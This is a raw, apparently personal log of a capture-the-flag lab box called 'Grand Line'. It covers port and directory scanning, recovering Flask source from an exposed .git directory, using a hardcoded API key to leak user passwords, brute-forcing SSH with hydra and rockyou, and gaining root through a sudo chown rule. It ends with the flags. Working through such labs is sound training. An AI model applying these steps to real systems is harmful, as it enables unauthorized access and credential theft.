Grand Line

IP Address
10.10.197.94

nmap -vv 10.10.197.94 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-23 13:20 CEST
Initiating Ping Scan at 13:20
Scanning 10.10.197.94 [2 ports]
Completed Ping Scan at 13:20, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:20
Completed Parallel DNS resolution of 1 host. at 13:20, 0.18s elapsed
Initiating Connect Scan at 13:20
Scanning 10.10.197.94 [65535 ports]
Discovered open port 22/tcp on 10.10.197.94
Discovered open port 80/tcp on 10.10.197.94

gobuster dir -u http://10.10.209.173/ -w ../../Downloads/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.209.173/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../Downloads/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/05/23 14:01:00 Starting gobuster in directory enumeration mode
===============================================================
/imgs                 (Status: 301) [Size: 0] [--> imgs/]
/index.html           (Status: 301) [Size: 0] [--> ./]   
/login                (Status: 301) [Size: 0] [--> login/]
/notes                (Status: 301) [Size: 0] [--> notes/]
/render/https://www.google.com (Status: 301) [Size: 0] [--> /render/https:/www.google.com]
                                                                                          
===============================================================
2024/05/23 14:01:19 Finished
===============================================================

http://10.10.197.94/
<h1>404 Not Found</h1>
<h2>Not a single pirate here, have you tried the other port ?</h2>
<img src="https://static0.cbrimages.com/wordpress/wp-content/uploads/2020/02/Luffy-Confused-Face-Cropped.jpg" />

gobuster dir -u 10.10.197.94 -w Downloads/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.197.94
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                Downloads/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/05/23 13:21:31 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 203]
/lost                 (Status: 301) [Size: 311] [--> http://10.10.197.94/lost/]
/server-status        (Status: 403) [Size: 277]                                
                                                                               
===============================================================
2024/05/23 13:21:53 Finished
===============================================================

http://10.10.197.94/lost/
	note.txt
http://10.10.197.94/lost/note.txt
You're stubborn, I told you everything is on the other port, have you tried nmap ?

nmap -vv 10.10.197.94 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-23 13:23 CEST
Initiating Ping Scan at 13:23
Scanning 10.10.197.94 [2 ports]
Completed Ping Scan at 13:23, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:23
Completed Parallel DNS resolution of 1 host. at 13:23, 0.29s elapsed
Initiating Connect Scan at 13:23
Scanning 10.10.197.94 [65535 ports]
Discovered open port 22/tcp on 10.10.197.94
Discovered open port 80/tcp on 10.10.197.94
Discovered open port 8081/tcp on 10.10.197.94

http://10.10.197.94/lost/.git/
[ ]	COMMIT_EDITMSG	2022-03-01 15:44 	514 	 
[ ]	HEAD	2022-03-01 15:41 	23 	 
[ ]	ORIG_HEAD	2022-03-01 15:41 	41 	 
[DIR]	branches/	2021-03-26 22:28 	- 	 
[ ]	config	2022-03-01 15:37 	92 	 
[ ]	description	2021-03-26 22:28 	73 	 
[DIR]	hooks/	2021-03-26 22:28 	- 	 
[ ]	index	2022-03-01 15:44 	137 	 
[DIR]	info/	2021-03-26 22:28 	- 	 
[DIR]	logs/	2021-03-26 22:32 	- 	 
[DIR]	objects/	2022-03-01 15:44 	- 	 
[DIR]	refs/	2021-03-26 22:28 	- 	 

http://10.10.197.94:8081
<html>
<head>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="/static/css/boot.css">
<script src="/static/js/min.js"></script>
<!------ Include the above in your HEAD tag ---------->
</head>
<!-- Top navigation -->
<nav class="navbar navbar-expand-md fixed-top top-nav">
	<div class="container">
		  <a class="navbar-brand" href="#"><strong>Nakamas</strong></a>
		  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
		    <span class="navbar-toggler-icon"><i class="fa fa-bars" aria-hidden="true"></i></span>
		  </button>

		  <div class="collapse navbar-collapse" id="navbarSupportedContent">
		    <ul class="navbar-nav ml-auto">
		      <li class="nav-item active">
		        <a class="nav-link" href="#">Home <span class="sr-only">(current)</span></a>
		      </li>
		      <li class="nav-item">
		        <a class="nav-link" href="#">About</a>
		      </li>
		      <li class="nav-item">
		        <a class="nav-link" href="#">Services</a>
		      </li>
		      <li class="nav-item">
		        <a class="nav-link" href="/login">Login</a>
		      </li>
		      <li class="nav-item">
		        <a class="nav-link" href="#">Prices</a>
		      </li>
		      <li class="nav-item">
		        <a class="nav-link" href="#">FAQ's</a>
		      </li>
		      <li class="nav-item">
		        <a class="nav-link" href="#">Contact</a>
		      </li>
		    </ul>
		  </div>	
	</div>
</nav>

<!-- Intro Seven -->
<section class="intro carousel slide bg-overlay-light h-auto" id="carouselExampleCaptions">
    <ol class="carousel-indicators">
      <li data-target="#carouselExampleCaptions" data-slide-to="0" class="active"></li>
      <li data-target="#carouselExampleCaptions" data-slide-to="1" class=""></li>
    </ol>
    <div class="carousel-inner" role="listbox">
      <div class="carousel-item active">
        <img class="d-block img-fluid" style="width:100%" src="https://images4.alphacoders.com/616/616945.png">
        <div class="carousel-caption ">
          	<h2 class="display-4 text-white mb-2 mt-4">If That Old Man Tells Me Anything...I Will Quit Being A Pirate. If It’s A Boring Adventure, I Don’t Want To Do It.</h2>
			<p class="text-white mb-3 px-5 lead">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do enim ad minim veniam, </p>
			<a href="#" class="btn btn-primary btn-capsul px-4 py-2">More</a>
        </div>
      </div>
      <div class="carousel-item">
        <img class="d-block img-fluid" style="width:100%" src="https://i.imgur.com/WpQ9lo8.jpg">
        <div class="carousel-caption ">
          	<h2 class="display-4 text-white mb-2 mt-4">I Love Heroes, But I Don’t Want To Be One. Do You Even Know What A Hero Is!? For Example, You Have Some Meat. Pirates Will Feast On The Meat, But The Hero Will Distribute It Among The People! I Want To Eat Meat!</h2>
			<p class="text-white mb-3 px-5 lead">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do enim ad minim veniam, </p>
			<a href="#" class="btn btn-primary btn-capsul px-4 py-2">More</a>
        </div>
      </div>
    </div>
    <a class="carousel-control-prev" href="#carouselExampleCaptions" role="button" data-slide="prev">
      <span class="carousel-control-prev-icon" aria-hidden="true"></span>
      <span class="sr-only">Previous</span>
    </a>
    <a class="carousel-control-next" href="#carouselExampleCaptions" role="button" data-slide="next">
      <span class="carousel-control-next-icon" aria-hidden="true"></span>
      <span class="sr-only">Next</span>
    </a>
</section>
</html>

http://10.10.197.94:8081/login
<html>
<head>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
<script src="/static/js/login.js"></script>
<link rel="stylesheet" href="/static/css/login.css">
</head>
<!------ Include the above in your HEAD tag ---------->

<div class="login-reg-panel">
		<div class="login-info-box">
			<h2>Have an account?</h2>
			<p>Lorem ipsum dolor sit amet</p>
			<label id="label-register" for="log-reg-show">Login</label>
			<input type="radio" name="active-log-panel" id="log-reg-show"  checked="checked">
		</div>
							
		<div class="register-info-box">
			<h2>Don't have an account?</h2>
			<p>Lorem ipsum dolor sit amet</p>
			<label id="label-login" for="log-login-show">Register</label>
			<input type="radio" name="active-log-panel" id="log-login-show">
		</div>
							
		<div class="white-panel">
			<div class="login-show">
				<h2>LOGIN</h2>
				<input type="text" placeholder="Email">
				<input type="password" placeholder="Password">
				<input type="button" value="Login">
				<a href="/forgot">Forgot password?</a>
			</div>
			<div class="register-show">
				<h2>REGISTER</h2>
				<input type="text" placeholder="Email">
				<input type="password" placeholder="Password">
				<input type="password" placeholder="Confirm Password">
				<input type="button" value="Register">
			</div>
		</div>
	</div>
</html>


http://10.10.68.113/lost/.git/objects/fc/
[ ]	f35f5eec90c388af8c510830be49bcb7fbd742	2022-03-01 15:39 	435 	 

root@ip-10-10-254-138:~# cat f35f5eec90c388af8c510830be49bcb7fbd742 
\ufffd\ufffdY\ufffd\ufffd\ufffd\ufffd\ufffdB(Yhz
\ufffd\ufffd\ufffdhW\ufffd-\ufffd\ufffd\ufffd6\ufffd\ufffd{%KvM\ufffd\ufffdEox\ufffd\ufffdy3j:\u0760j\ufffd\ufffd\ufffd0\ufffdG\ufffdc\ufffd\ufffd~\ufffd\u01a1\ufffd,\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdcB\ufffd\ufffdeD#-\ufffdk\ufffdz\ufffd\ufffd"\u02ee}|i\ufffd\ufffd 'g\ufffd\ufffd$\ufffd\ufffd\uff38\u0310?\ufffdh\ufffd\8'i\ufffdw}\ufffd\ufffdNe:\ufffd\ufffd*iM\ufffd\ufffdiM\ufffdk\ufffdA\ufffd\ufffdN\ufffd\ufffd\ufffd\ufffd\ufffd_3m\ufffd\ufffd\u07a0M\ufffd\ufffdV\u86f4V\ufffd\ufffd\ufffd$\ufffd\ufffd\ufffd\ufffd+\ufffd\ufffd\ufffd\ufffd5\ufffd\ufffd\ufffdl\ufffd\ufffd\u07d3\u01c3B\ufffd%\ufffd E\ufffd\ufffdR\ufffdq
\u0643X0A)\ufffd\ufffd`\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd`\ufffdr9\ufffd\ufffd\ufffd\u01449s\ufffd\ufffd\ufffd,w\ufffd\ufffd'\ufffdU.\ufffdi\ufffd\u079b"+fn\u013e\ufffd\ufffd3\ufffd\ufffdGJ\ufffd\ufffd\ufffd7\ufffd\ufffd,\ufffd\u06ea\\ufffd\ufffdc\ufffd5M\ufffdj\ufffd\ufffd\u0708\ufffd\ufffd\ufffd72u\u04a1\ufffd\ufffd%\ufffdp\ufffd\u0590\ufffd\ufffd:\ufffd\ufffd\ufffd\ufffd\ufffds\ufffdO\|\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd|l\u07a0\ufffdvi\ufffd\ufffdf?[\ufffd\ufffdD\ufffd\ufffdbM\ufffd>\ufffd|\ufffd\ufffd\ufffd\ufffd\N\ufffd,\ufffd\ufffd\ufffdUY\ufffd\ufffd_%   !root@ip-10-10-254-138:~# 

https://github.com/b1fair/get-git-object/blob/master/gitit.py

python test.py f35f5eec90c388af8c510830be49bcb7fbd742 
b'blob 856\x00from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route(\'/\')\ndef index():\n    return render_template(\'index.html\')\n\n@app.route(\'/login\')\ndef login():\n    return render_template(\'login.html\')\n\n@app.route(\'/api/\')\n@app.route(\'/api\')\ndef api():\n    return "API Action Missing"\n\n@app.route(\'/api/<uname>\',methods=[\'POST\'])\ndef info(uname):\n    if(uname == ""):\n        return "Username not provided"\n    print("OK")\n    data=request.get_json(force=True)\n    print(data)\n    if(data[\'key\']==\'57db5c001c802fc4be25afb02cff9bf8\'):\n        if(uname=="admin"):\n            return \'{"username":"admin","password":"AdminPasswd"}\'\n        else:\n            return \'Invalid Username\'\n    else:\n        return "Invalid API Key"\n\n@app.route(\'/forgot\')\ndef forgot():\n    return render_template(\'forgot.html\')\n\napp.run(host=\'0.0.0.0\',port=8081)\n'

Postman:
10.10.68.113:8081/api/luffy
body:
{"key" : "57db5c001c802fc4be25afb02cff9bf8"}

{"username":"luffy","password":"ThisIsNotMyPassword"}

ssh luffy@10.10.68.113
The authenticity of host '10.10.68.113 (10.10.68.113)' can't be established.
ECDSA key fingerprint is SHA256:t0/3cHdK4vYAwCE2QefO+zIgTg0DipgMcPQLhnjgwhA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.68.113' (ECDSA) to the list of known hosts.
luffy@10.10.68.113's password: 
Permission denied, please try again.
luffy@10.10.68.113's password:

10.10.68.113:8081/api/zoro
{"username":"zoro","password":"1_G07_L0S7_0Nc3_4G41n"}

root@ip-10-10-254-138:~# ssh zoro@10.10.68.113
zoro@10.10.68.113's password: 

zoro@grandline:~$ ls
user.txt  web
zoro@grandline:~$ cat user.txt
EPI{1f_1_91V3_uP_noW_1M_9o1N9_7O_r39R37_17}

zoro@grandline:~$ cd /home
zoro@grandline:/home$ ls
luffy  zoro

crack mot de passe de luffy :
$ hydra -l <username> -p <password> <server> <service>
avec -L et -P => Dictionary
-t pour le nombre de threads 

hydra -l luffy -P Tools/wordlists/rockyou.txt 10.10.93.226 ssh -t 50

[22][ssh] host: 10.10.145.124   login: luffy   password: ONEPIECE
1 of 1 target successfully completed, 1 valid password found

ssh luffy@10.10.145.124

sudo -l
Matching Defaults entries for luffy on grandline:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User luffy may run the following commands on grandline:
    (root) NOPASSWD: /bin/chown

luffy@grandline:~$ sudo /bin/chown luffy /root
luffy@grandline:~$ cd /root/
luffy@grandline:/root$ ls
thisIsATreasureDidYouExpectRootDotTXT.txt
luffy@grandline:/root$ cat thisIsATreasureDidYouExpectRootDotTXT.txt 
EPI{r_W3_Phri3nD2_0R_ph032_7h@_KInd_0F_7Hin9_J00_D3CiD3_J00R53lv32}
